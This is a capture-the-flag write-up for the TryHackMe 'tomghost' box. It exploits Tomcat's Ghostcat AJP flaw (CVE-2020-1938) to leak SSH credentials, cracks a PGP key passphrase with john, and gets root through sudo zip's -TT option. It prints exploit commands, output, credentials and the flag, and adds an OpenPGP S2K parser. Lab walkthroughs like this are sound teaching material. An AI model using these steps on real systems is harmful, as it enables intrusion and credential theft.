tomghost
First, scan the ports:
~$ nmap 10.201.95.183
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-18 11:08 UTC
Nmap scan report for 10.201.95.183
Host is up (0.095s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
8009/tcp open ajp13
8080/tcp open http-proxy
Nmap done: 1 IP address (1 host up) scanned in 2.84 seconds
Now get the service version on 8080:
Birkenwald@VMLinux:~$ nmap 10.201.95.183 -sV -p 8080
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-18 11:13 UTC
Nmap scan report for 10.201.95.183
Host is up (0.094s latency).
PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat 9.0.30
Finding an exploit for the known CVE
searchsploit turns up the relevant entries. Tomcat 9.0.30 with the AJP connector (8009) reachable from the network is the Ghostcat setup: CVE-2020-1938, where the AJP connector accepts arbitrary request attributes from the client, so a crafted AJP request can make the DefaultServlet read any file under the webapp root, including WEB-INF/web.xml. The fix shipped in Tomcat 9.0.31 (and 8.5.51 / 7.0.100), which also binds AJP to localhost and requires a shared secret by default. Running the exploit against the AJP port returns web.xml, and its description field holds a username and password (the target address differs from the scan above, presumably a redeployed instance):
Birkenwald@VMLinux:~$ python2 cve-2020-1938_exp.py 10.201.10.29
Getting resource at ajp13://10.201.10.29:8009/asdf
----------------------------
<?xml version="1.0" encoding="UTF-8"?>
<!--
  Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at

      http://www.apache.org/licenses/LICENSE-2.0

  Unless required by applicable law or agreed to in writing, software
  distributed under the License is distributed on an "AS IS" BASIS,
  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  See the License for the specific language governing permissions and
  limitations under the License.
-->
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
                      http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
  version="4.0"
  metadata-complete="true">

  <display-name>Welcome to Tomcat</display-name>
  <description>
     Welcome to GhostCat
     skyfuck:8730281lkjlkjdqlksalks
  </description>

</web-app>
After logging in over SSH with those credentials, a quick find locates user.txt.
sudo -l for privilege escalation goes nowhere: the user is not allowed to run sudo.
Next, look for SUID binaries:
find / -perm -4000 -type f 2>/dev/null
Nothing useful there either.
Cracking the PGP key and decrypting the file
Back in the home directory there are two files with telling extensions: credential.pgp (a PGP-encrypted file) and tryhackme.asc (an ASCII-armored PGP key).
Copy them to the attacking machine (scp needs -r to copy the directory, or name the two files explicitly):
scp -r skyfuck@10.201.10.29:/home/skyfuck/ .
Reference: 关于PGP加密文件的解密方法 - 野荷 - 博客园 (a 博客园 post on decrypting PGP-encrypted files).
First extract the passphrase hash of the armored secret key (tryhackme.asc, saved here as 1.asc) into john's format; the key's secret material is encrypted with a passphrase-derived key, and that is what gets cracked, not the encrypted file itself:
gpg2john 1.asc > hash.txt
Crack the passphrase hash with john and rockyou:
┌──(kali㉿kali)-[~]
└─$ john --wordlist=rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
Cost 1 (s2k-count) is 65536 for all loaded hashes
Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes
Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 9 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
alexandru        (tryhackme)
1g 0:00:00:00 DONE (2025-11-18 10:00) 6.250g/s 6700p/s 6700c/s 6700C/s theresa..alexandru
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
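The three Cost lines john prints are the string-to-key (S2K) parameters stored inside the secret key packet: iteration count 65536, hash 2 (SHA1) and cipher 9 (AES256). The following added example (not from the writeup, john or gpg2john) dearmors a PRIVATE KEY BLOCK, walks the OpenPGP packets (RFC 4880 §4.2) and decodes those fields from every secret key and subkey packet, which is exactly what gpg2john has to pull out before john can start guessing. build_sample_key constructs a fake DSA key with dummy MPIs so the parser can be run offline; point it at tryhackme.asc to read the real values.

```python
"""Report the S2K parameters protecting an OpenPGP secret key (the fields gpg2john extracts).
Added example, not the writeup's or john's code. Usage: python3 pgp_s2k.py tryhackme.asc
"""
import base64
import struct
import sys

HASH_ALGOS = {1: "MD5", 2: "SHA1", 3: "RIPEMD160", 8: "SHA256", 9: "SHA384", 10: "SHA512", 11: "SHA224"}
CIPHER_ALGOS = {1: "IDEA", 2: "3DES", 3: "CAST5", 4: "Blowfish", 7: "AES128", 8: "AES192",
                9: "AES256", 10: "Twofish", 11: "Camellia128", 12: "Camellia192", 13: "Camellia256"}
PUBKEY_ALGOS = {1: "RSA", 16: "Elgamal", 17: "DSA"}
PUBLIC_MPIS = {1: 2, 16: 3, 17: 4}          # RSA n,e; Elgamal p,g,y; DSA p,q,g,y
S2K_TYPES = {0: "simple", 1: "salted", 3: "iterated+salted"}


def dearmor(text):
    """Binary packet data of the first armored block; armor headers and the '=' CRC24 line are skipped."""
    lines, in_block = [], False
    for line in text.splitlines():
        if line.startswith("-----BEGIN PGP"):
            in_block = True
        elif line.startswith("-----END PGP"):
            break
        elif in_block and line.strip() and ":" not in line and not line.startswith("="):
            lines.append(line.strip())
    return base64.b64decode("".join(lines))


def packets(data):
    """Yield (tag, body) for every packet; handles both old- and new-format headers."""
    i = 0
    while i < len(data):
        hdr = data[i]
        i += 1
        if hdr & 0x40:                                   # new format: tag in low 6 bits
            tag, first = hdr & 0x3F, data[i]
            i += 1
            if first < 192:
                length = first
            elif first < 224:
                length = ((first - 192) << 8) + data[i] + 192
                i += 1
            elif first == 255:
                length = struct.unpack(">I", data[i:i + 4])[0]
                i += 4
            else:
                raise ValueError("partial body lengths not supported")
        else:                                            # old format: tag in bits 2..5
            tag, ltype = (hdr >> 2) & 0x0F, hdr & 3
            if ltype == 3:
                raise ValueError("indeterminate length not supported")
            n = (1, 2, 4)[ltype]
            length = int.from_bytes(data[i:i + n], "big")
            i += n
        yield tag, data[i:i + length]
        i += length


def s2k_count(code):
    """Decode the one-octet iterated S2K count (RFC 4880 §3.7.1.3); 0x60 -> 65536."""
    return (16 + (code & 15)) << ((code >> 4) + 6)


def parse_secret_key(body):
    """Skip the public fields of a v4 key and decode the S2K specifier that follows them."""
    if body[0] != 4:
        raise ValueError("only v4 keys handled")
    algo, pos = body[5], 6
    for _ in range(PUBLIC_MPIS[algo]):               # each MPI: 2-byte bit length + value bytes
        bits = struct.unpack(">H", body[pos:pos + 2])[0]
        pos += 2 + (bits + 7) // 8
    usage = body[pos]
    pos += 1
    info = {"pubkey": PUBKEY_ALGOS.get(algo, algo), "protected": usage != 0}
    if usage == 0:
        return info                                  # secret MPIs stored in the clear
    if usage not in (254, 255):
        raise ValueError("legacy S2K usage octet %d not handled" % usage)
    info["cipher"] = CIPHER_ALGOS.get(body[pos], body[pos])
    s2k_type, info["hash"] = body[pos + 1], HASH_ALGOS.get(body[pos + 2], body[pos + 2])
    info["s2k_type"] = S2K_TYPES.get(s2k_type, s2k_type)
    pos += 3
    if s2k_type in (1, 3):
        info["salt"] = body[pos:pos + 8].hex()
        pos += 8
    if s2k_type == 3:
        info["s2k_count"] = s2k_count(body[pos])
    info["checksum"] = "SHA1" if usage == 254 else "16-bit"
    return info


def inspect(armored):
    """S2K info for every secret key (tag 5) and secret subkey (tag 7) packet in an armored block."""
    return [parse_secret_key(b) for tag, b in packets(dearmor(armored)) if tag in (5, 7)]


def build_sample_key():
    """Constructed sample, not a real key: v4 DSA secret key with 1-byte dummy MPIs, protected
    with AES256 and an iterated+salted SHA1 S2K whose count code 0x60 means 65536 iterations."""
    pub = b"\x04" + struct.pack(">I", 1583884800) + b"\x11"      # version 4, creation time, algo 17 = DSA
    for v in (7, 5, 3, 2):                                        # dummy p, q, g, y
        pub += struct.pack(">H", v.bit_length()) + bytes([v])
    s2k = b"\xfe\x09\x03\x02" + bytes(range(8)) + b"\x60"           # usage 254, AES256, type 3, SHA1, salt, count
    body = pub + s2k + bytes(16) + bytes(24)                        # + IV + placeholder encrypted MPI/checksum
    packet = bytes([0xC5, len(body)]) + body                        # new-format header, tag 5, 1-octet length
    return ("-----BEGIN PGP PRIVATE KEY BLOCK-----\nVersion: constructed sample\n\n"
            + base64.b64encode(packet).decode() + "\n=AAAA\n-----END PGP PRIVATE KEY BLOCK-----\n")


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else build_sample_key()
    for entry in inspect(text):
        print(entry)
```

The s2k_count value is the knob that sets the cost of each guess: every candidate passphrase has to be run through that many bytes of salted SHA1 before the result can be tried as the AES256 key, so a key generated with a larger count cracks proportionally slower. 65536 is low enough that rockyou finishes in well under a second, as the john run above shows.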
Decrypt: import the secret key, then decrypt credential.pgp (gpg prompts for the key passphrase, alexandru, cracked above):
┌──(kali㉿kali)-[~]
└─$ gpg --import tryhackme.asc
gpg: key 8F3DA3DEC6707170: "tryhackme <stuxnet@tryhackme.com>" not changed
gpg: key 8F3DA3DEC6707170: secret key imported
gpg: key 8F3DA3DEC6707170: "tryhackme <stuxnet@tryhackme.com>" not changed
gpg: Total number processed: 2
gpg:              unchanged: 2
gpg:       secret keys read: 1
gpg:   secret keys imported: 1

┌──(kali㉿kali)-[~]
└─$ gpg --list-secret-keys
/home/kali/.gnupg/pubring.kbx
-----------------------------
sec   dsa3072 2020-03-11 [SCA]
      14B3794D5554349A715CDBA08F3DA3DEC6707170
uid           [ unknown] tryhackme <stuxnet@tryhackme.com>
ssb   elg1024 2020-03-11 [E]

┌──(kali㉿kali)-[~]
└─$ gpg --decrypt credential.pgp
gpg: encrypted with elg1024 key, ID 61E104A66184FBCC, created 2020-03-11
      "tryhackme <stuxnet@tryhackme.com>"
gpg: WARNING: cipher algorithm CAST5 not found in recipient preferences
merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j
Lateral movement + sudo -l privilege escalation
Log in as merlin with the recovered password; sudo -l shows that merlin may run zip as root, which is the GTFOBins zip escalation. -T tells zip to test the archive it just wrote and -TT replaces the default tester (unzip -tqq) with an arbitrary command, which zip runs with the archive path appended; the trailing '#' comments that path out, so sh is executed as root. TF=$(mktemp -u) supplies a fresh archive name (the writeup omitted this line; without it zip has no archive to create):
merlin@ubuntu:~$ TF=$(mktemp -u)
merlin@ubuntu:~$ sudo zip $TF /etc/hosts -T -TT 'sh #'
  adding: etc/hosts (deflated 31%)
# pwd
rm: missing operand
Try 'rm --help' for more information.
# whoami
root
# cd /root
# ls
root.txt ufw
# cat root.txt
THM{Z1P_1S_FAKE}